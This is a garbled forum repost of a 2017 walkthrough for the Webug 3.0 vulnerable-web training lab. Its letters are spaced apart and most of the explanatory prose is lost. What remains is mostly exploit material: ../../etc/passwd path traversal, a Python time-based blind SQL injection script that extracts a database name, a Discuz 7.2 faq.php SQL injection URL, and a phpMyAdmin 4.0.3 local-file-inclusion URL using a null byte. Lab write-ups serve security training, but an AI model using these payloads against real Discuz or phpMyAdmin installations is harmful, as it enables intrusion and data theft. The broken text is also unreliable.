[11976] 2017-11-05_我们的漏洞Webug3.0中级进阶攻略(上)

文档创建者:s7ckTeam
浏览次数:9
最后更新:2025-01-18
2017-11-05_我们的漏洞Webug3.0中级进阶攻略(上) W e b u g   3 . 0     F r e e B u f   2 0 1 7 - 1 1 - 0 5 W e B u g P H P / m y s q l W i n d o w s W e B u g w e b W i n d o w s   2 0 0 3 W e b u g 3 . 0         姿   ~ 西 西   . . / . . / e t c / p a s s w d . . / . . / e t c / p a s s w d     w e b u g w i n d o w s   2 0 0 3   / e t c / p a s s w d g o     c o u n t r y . .
c c     i n d e x . h t m l f l a g    
  p a s s     u r l   p o s t  
  p o s t     T M           h o s t       4
f l a g A P K F L A G   A P K a p k a n d r o i d   k i l l e r   a p k   b a s e 6 4 f l a g a p k   f l a g  
t y p e   g e t s l e e p ( )     x       p y t h o n   p a y l o a d D Z   =   =   # e n c o d i n g = u t f - 8   # i m p o r t   r e q u e s t s i m p o r t   t i m e p a y l o a d s   =   ' q w e r t y u i o p a s d f g h j k l z x c v b n m Q W E R T Y U I O P A S D F G H J K L Z X C V B N M 0 1 2 3 4 5 6 7 8 9 @ _ . } { , ' # l e n g t h = 0 d a t a b a s e = ' ' t a b l e = ' ' p r i n t   ' s t a r t   g e t   l e n g t h . . . ' f o r   l   i n   r a n g e ( 1 , 2 1 ) :         s t a r t T i m e 1 = t i m e . t i m e ( )         u r l 1   =   " h t t p : / / 1 9 2 . 1 6 8 . 3 7 . 1 4 7 / p e n t e s t / t e s t / t i m e / ? t y p e = 1   a n d   i f ( l e n g t h ( d a t a b a s e ( ) ) = % d , s l e e p ( 5 ) , 1 ) " % ( l )         r e s p o n s e 1   =   r e q u e s t s . g e t ( u r l 1 )         i f   t i m e . t i m e ( )   -   s t a r t T i m e 1   >   5 :                 l e n g t h = l                 p r i n t   " t h e   l e n g t h   i s   "   +   s t r ( l e n g t h )                 b r e a k p r i n t   ' s t a r t   d a t a b a s e   s q l   i n j e c t i o n . . . ' f o r   d   i n   r a n g e ( 1 , l e n g t h + 1 ) :         f o r   p a y l o a d   i n   p a y l o a d s :                 s t a r t T i m e 2 = t i m e . t i m e ( )                 u r l 2   =   " h t t p : / / 1 9 2 . 1 6 8 . 3 7 . 1 4 7 / p e n t e s t / t e s t / t i m e / ? t y p e = 1   a n d   i f ( s u b s t r ( d a t a b a s e ( ) , ' % d ' , 1 ) = ' % s ' , s l e e p ( 5 ) , 1 ) " % ( d , p a y l o a d )                 r e s p o n s e 2   =   r e q u e s t s . g e t ( u r l 2 )   #                 i f   t i m e . t i m e ( )   -   s t a r t T i m e 2   >   5 :   # 5     s l e e p ( 5 )                         d a t a b a s e + = p a y l o a d                         p r i n t   d a t a b a s e                         b r e a k p r i n t   " t h e   d a t a b a s e   i s   "   +   d a t a b a s e
d z 7 . 2 M y S Q L   D u p l i c a t e   e n t r y     P o C f a q . p h p   1 4 8 1 8 5 g r o u p i d s g i d s g r o u p i d s d z g e t a d d s l a s h e s           $ g r o u p i d s [ ]   =   $ r o w [ 0 ]       f a q . p h p ? a c t i o n = g r o u p p e r m i s s i o n & g i d s [ 9 9 ] = % 2 7 & g i d s [ 1 0 0 ] [ 0 ] = % 2 9 % 2 0 a n d % 2 0 % 2 8 s e l e c t % 2 0 1 % 2 0 f r o m % 2 0 % 2 8 s e l e c t % 2 0 c o u n t % 2 8 * % 2 9 , c o n c a t % 2 8 v e r s i o n % 2 8 % 2 9 , f l o o r % 2 8 r a n d % 2 8 0 % 2 9 * 2 % 2 9 % 2 9 x % 2 0 f r o m % 2 0 i n f o r m a t i o n _ s c h e m a . t a b l e s % 2 0 g r o u p % 2 0 b y % 2 0 x % 2 9 a % 2 9 % 2 3
1 9 0     g r o u p i d s   i m p l o d e i d s   / i n c l u d e / g l o b a l . f u n c . p h p   6 7 2   i m p l o d e i d s   ,   1 2 3 4 1 , 2 , 3 , 4     1 , , 3 , 4 4 3 5 3 f a q . p h p ? g i d s [ x ] = & g i d s [ x + 1 ] [ u i d ] = s q l   A S P C M S   i n g p h p M y A d m i n       p h p M y a d m i n   4 . 0 . 3   +   p h p   5 . 2 . 1 7 p h p M y A d m i n h t t p : / / p a n . b a i d u . c o m / s / 1 d E Y o 9 z j P o C t o k e n p h p M y A d m i n C S R F g i s _ d a t a [ g i s _ t y p e ] = f i l e % 0 0   f i l e   . / l i b r a r i e s / g i s / p m a _ g i s _ f i l e % 0 0 f u n c t i o n   i m p l o d e i d s ( $ a r r a y )   {         i f ( ! e m p t y ( $ a r r a y ) )   {                 r e t u r n   " ' " . i m p l o d e ( " ' , ' " ,   i s _ a r r a y ( $ a r r a y )   ?   $ a r r a y   :   a r r a y ( $ a r r a y ) ) . " ' " ;         }   e l s e   {                 r e t u r n   ' ' ;         } } h t t p : / / l o c a l h o s t / p m a 4 . 0 . 3 / g i s _ d a t a _ e d i t o r . p h p ? t o k e n = 4 f 4 b 3 e e 0 7 f f c 8 4 e 6 b b e f 6 2 4 9 3 1 a e 6 9 9 9 & g i s _ d a t a [ g i s _ t y p e ] = / . . / . . / a d v i s o r y _ r u l e s . t x t % 0 0
  l i b r a r i e s g i s p m a _ g i s _ f a c t o r y . p h p   2 9   t y p e   3 3     t y p e _ l o w e r   i n c l u d e _ o n c e g i s _ d a t a _ e d i t o r . p h p
2 8   $ _ R E Q U E S T [ g i s _ d a t a ]   g i s _ d a t a 4 4   $ g i s _ d a t a [ g i s _ t y p e ]   6 0 g e o m _ t y p e P M A _ G I S _ F a c t o r y : : f a c t o r y   $ g i s _ d a t a [ g i s _ t y p e ]   i n c l u d e _ o n c e * F r e e B u f
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则